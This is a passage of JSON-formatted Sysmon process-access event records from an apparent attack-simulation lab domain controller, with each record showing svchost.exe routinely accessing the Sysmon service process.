05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1337,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1338,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1339,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1340,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1341,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1342,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1343,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1344,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 